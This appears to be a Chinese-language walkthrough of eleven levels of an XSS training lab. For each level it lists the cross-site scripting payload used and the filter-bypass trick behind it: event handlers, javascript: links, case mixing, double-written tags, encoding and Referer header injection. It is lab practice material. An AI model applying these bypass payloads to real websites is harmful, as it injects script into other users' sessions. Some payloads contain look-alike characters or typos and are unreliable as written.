目录
有需要的小伙伴可以联系我!先关闭WAF
1.less-1
为GET类型的请求,可以直接在URL进行注入JS脚本
2.less-2
当输入jinyouxin时,查看源码
和sql注入确定是数字型或是字符型类似,可以使用闭合的方式
"> <script>alert("jinyouxin")</script>
3.less-3
当输入<script>alert("jinyouxin")</script>时,发现< > 被编码,故可以使用onmouseover进行绕过
'οnmοuseοver='alert(/jinyouxin/)
4.less-4
先尝试是哪种方式防御,<script>alert("jinyouxin")</script>时
<和>被过滤到了,故同上 ”οnmοuseοver='alert(/jinyouxin/)
5.less-5
由上面思路已经知道<sCcrippt ' "on>都是敏感信息
可知on被kill,使用伪协议:“javascript:”、“php://”、“edk2://”
"><a href = "javascript:alert:alert(/jinyouxin/)">click</a>
6.less-6
同上次方法
可知href也做了处理,试一试大小写hREf,过了(试了n次其他方法)
7.less-7
on过滤掉了,在试试script也被过滤了,试试双写
"><scscriptript>alert("flag")</scripscriptt>
"Oοnmοuseοver="alert(/flag/)
8.less-8
单引号没有处理!!!先试试伪协议:javascript:alert(/flag/)
试试s的十六进制编码,javascript:alert(/flag/) (其他字母也可也)过了
9.less-9
换成合法http://www.baidu.com试试,过了
10.less-10
输入 <sCcrippt ' "on>,value为空,但是name是提示信息,一个个试
有反应不过<和>什么了,添加弹窗button
click" type="button" οnclick="alert(/flag/)
11.less-11
Burp suite抓包试试 ,有referer,试试t_ref
Referer: " type="text" οnclick="alert('flag')